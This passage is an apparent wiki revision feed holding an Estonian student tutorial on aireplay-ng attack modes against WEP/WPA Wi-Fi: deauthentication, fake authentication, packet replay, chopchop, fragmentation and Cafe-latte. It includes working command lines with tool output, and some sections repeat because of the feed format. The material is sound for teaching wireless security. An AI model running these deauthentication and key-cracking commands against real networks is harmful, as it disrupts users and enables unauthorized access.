Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32781</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32781"/>
		<updated>2011-05-24T18:34:36Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Suunatud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0 -c CC:CC:CC:CC:CC:CC --ignore-negative-one&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
